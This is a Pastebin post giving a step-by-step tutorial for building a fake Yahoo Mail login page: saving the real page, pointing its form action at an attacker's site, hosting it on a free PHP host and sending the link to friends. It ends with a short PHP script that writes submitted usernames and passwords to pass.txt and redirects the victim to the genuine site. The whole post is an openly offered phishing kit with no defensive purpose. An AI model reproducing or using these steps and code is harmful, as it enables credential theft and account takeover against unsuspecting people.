Advertisement
ysecurity

yahoo scam page making free tutorial

Nov 29th, 2014
4,655
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.20 KB | None | 0 0
  1. Note
  2. this is not my tutorial i just find it on a website its working than i decide to share with u hope it will work for u
  3. if u like sahre my post on facebook thnx
  4. Here We Start
  5. STEP 1.
  6. Go to the Yahoo login page by typing the following URL.
  7.  
  8. mail.yahoo.com
  9.  
  10. STEP 2.
  11.  
  12. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
  13. To save the page goto File->Save As
  14.  
  15. Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.
  16.  
  17. STEP 3.
  18. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .
  19.  
  20. STEP 4.
  21. Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML
  22.  
  23. STEP 5.
  24. Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.
  25.  
  26. For example you may find something like this in the opened HTML file
  27.  
  28. src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”
  29.  
  30. Rename the above link into
  31.  
  32. src=”files/ma_mail_1.gif”
  33.  
  34. Repeat the same procedure for every file contained in the folder by name “files“.
  35.  
  36. Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.
  37.  
  38. STEP 6.
  39. Now search for the following term
  40.  
  41. action=
  42.  
  43. you will see something like this
  44.  
  45. action=https://login.yahoo.com/config/login?
  46.  
  47. Edit this to
  48.  
  49. action=http://yoursite.com/login.php
  50.  
  51. Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.
  52.  
  53. Save the changes to the file.
  54.  
  55. NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.
  56.  
  57. STEP 7.
  58. Now you have to upload your yahoo.HTML, files folder and login.php to
  59.  
  60. yoursite.com Root folder
  61.  
  62. NOTE: Make sure that your host supports PHP
  63.  
  64. Tip: 110mb.com supports PHP
  65.  
  66. STEP 8.
  67. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)
  68.  
  69. Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password
  70.  
  71. NOTE: The concept here is to save the password.The format is not important here.
  72.  
  73. STEP 9.
  74. Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
  75. here is the login script
  76.  
  77.  
  78. header("Location: http://WEBSITE ");
  79. $handle =
  80.  
  81. fopen("pass.txt", "a");
  82. foreach($_GET as
  83.  
  84. $variable => $value) {
  85. fwrite($handle,
  86.  
  87. $variable);
  88. fwrite($handle, "=");
  89.  
  90. fwrite($handle, $value);
  91. fwrite($handle,
  92.  
  93. "\r\n");
  94. }
  95. fwrite($handle, "\r\n");
  96. fclose($handle);
  97. exit;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement